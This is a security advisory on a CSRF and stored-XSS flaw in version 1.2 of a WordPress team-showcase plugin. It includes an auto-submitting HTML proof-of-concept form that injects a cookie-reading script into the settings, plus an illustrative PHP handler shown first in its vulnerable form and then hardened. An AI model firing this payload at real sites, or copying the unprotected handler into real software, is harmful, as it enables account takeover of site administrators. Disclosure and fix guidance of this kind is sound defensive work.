WordPress Our Team Showcase plugin version 1.2 suffers from a cross-site request forgery vulnerability in its settings page that can be leveraged to trick a logged-in admin into storing cross-site scripting code, which then executes in the admin's browser.
Title: WordPress 'Our Team Showcase' plugin - CSRF/XSS
Version: 1.2
Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej
Date: 2014/12/12
Download: https://wordpress.org/plugins/our-team-enhanced/
Notified WordPress: 2014/11/27
----------------------------------------------------------------
## Description:
----------------------------------------------------------------
This plugin allows you to add, edit, search and display your team members on any page, or in a widget, quickly and easily.
It comes with a couple of different styles to choose from.
Re-order team members with a simple drag & drop.
Output your team members anywhere with the shortcode [our-team].
Boosts SEO with schema.org markup.
## CSRF:
----------------------------------------------------------------
The plugin's settings form (wp-admin/edit.php?post_type=team_member&page=sc_team_settings) is processed without any anti-CSRF token (no WordPress nonce check), so an attacker can change the plugin's admin settings by tricking a logged-in admin into visiting a crafted page that submits the form on the attacker's behalf. The admin's browser attaches the WordPress session cookies automatically, and no user interaction beyond loading the page is required.
## Stored XSS:
----------------------------------------------------------------
Some of the settings submitted from the admin page are stored without sanitization and rendered back into the plugin's admin page without output escaping. An attacker who can set those values can therefore store JavaScript in the settings fields; it runs whenever an administrator opens the settings page. Combined with the CSRF issue above, the attacker does not need an account at all: the crafted page both writes the payload and, on the admin's next visit to the settings page, has it executed with the admin's session.
PoC:
Log in as admin and then submit the following form (in a real attack it would be hosted on an attacker-controlled page and auto-submitted, as in the last line). The member-count value carries the payload, with the quote and angle brackets HTML-encoded so that the browser submits them literally rather than treating them as part of the PoC page's own markup. Replace [DOMAIN] with the target host.
<form method="POST" action="http://[DOMAIN]/wp-admin/edit.php?post_type=team_member&page=sc_team_settings" enctype="multipart/form-data">
<input type="text" name="sc_our_team_template" value="grid"><br />
<input type="text" name="sc_our_team_social" value="yes"><br />
<label>sc_our_team_member_count: </label>
<input type="text" name="sc_our_team_member_count" value="-1&quot;&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;"><br />
<input type="text" name="sc_our_team_save" value="Update"><br />
<input type="submit">
</form>
<!-- Auto-submit so the victim only has to load the page -->
<script>document.forms[0].submit();</script>
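To make the two issues concrete, the following is an added example written for this page, not the plugin's own code: a minimal WordPress settings handler for the fields named in the PoC, first in the unprotected shape the CSRF and stored XSS sections describe, then hardened. The option names mirror the form fields above; the function names, the nonce action name, the "list" template value and the hook wiring are assumptions for illustration.

```php
<?php
// Added example, not code from the Our Team Showcase plugin.
// Assumed: options named after the PoC form fields, functions attached to the
// plugin's settings page callback.

// --- Vulnerable shape: no nonce, no capability check, raw input stored,
// and the stored value echoed back into the form unescaped. ---
function sc_team_settings_page_vulnerable() {
    if ( isset( $_POST['sc_our_team_save'] ) ) {
        // Any cross-site POST carrying a logged-in admin's cookies lands here (CSRF).
        update_option( 'sc_our_team_template', $_POST['sc_our_team_template'] );
        update_option( 'sc_our_team_social', $_POST['sc_our_team_social'] );
        update_option( 'sc_our_team_member_count', $_POST['sc_our_team_member_count'] );
    }
    // Stored XSS: a value such as  -1"><script>alert(document.cookie);</script>
    // closes the attribute and injects a script tag into the admin page.
    echo '<input type="text" name="sc_our_team_member_count" value="'
        . get_option( 'sc_our_team_member_count', '-1' ) . '">';
}

// --- Hardened shape: nonce + capability check, validation on input,
// escaping on output. ---
function sc_team_settings_page_fixed() {
    if ( isset( $_POST['sc_our_team_save'] ) ) {
        // 1. CSRF: die unless the request carries a valid nonce for this action.
        //    The nonce is tied to the user session, so a foreign page cannot forge it.
        check_admin_referer( 'sc_our_team_save_settings', 'sc_our_team_nonce' );

        // 2. Authorization: a nonce proves intent, not privilege.
        if ( ! current_user_can( 'manage_options' ) ) {
            wp_die( __( 'Insufficient permissions.' ) );
        }

        // 3. Validate against the expected type / allow-list before storing.
        $allowed_templates = array( 'grid', 'list' ); // assumed template names
        $template = isset( $_POST['sc_our_team_template'] )
            ? sanitize_key( $_POST['sc_our_team_template'] ) : 'grid';
        if ( ! in_array( $template, $allowed_templates, true ) ) {
            $template = 'grid';
        }

        $social = ( isset( $_POST['sc_our_team_social'] )
            && 'yes' === $_POST['sc_our_team_social'] ) ? 'yes' : 'no';

        // -1 means "show all"; anything else must be a non-negative integer.
        $count = isset( $_POST['sc_our_team_member_count'] )
            ? intval( $_POST['sc_our_team_member_count'] ) : -1;
        if ( $count < -1 ) {
            $count = -1;
        }

        update_option( 'sc_our_team_template', $template );
        update_option( 'sc_our_team_social', $social );
        update_option( 'sc_our_team_member_count', $count );
    }
    ?>
    <form method="post">
        <?php wp_nonce_field( 'sc_our_team_save_settings', 'sc_our_team_nonce' ); ?>
        <!-- 4. Escape on output: even a bad stored value cannot leave the attribute. -->
        <input type="text" name="sc_our_team_member_count"
               value="<?php echo esc_attr( get_option( 'sc_our_team_member_count', -1 ) ); ?>">
        <input type="submit" name="sc_our_team_save" value="Update">
    </form>
    <?php
}
```

The two halves of the fix are independent and both are needed: the nonce alone would still let a malicious administrator store a payload that fires in another admin's browser, and escaping alone would still let a cross-site page silently rewrite the plugin's settings.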
## Solution:
----------------------------------------------------------------
Update to version 1.3.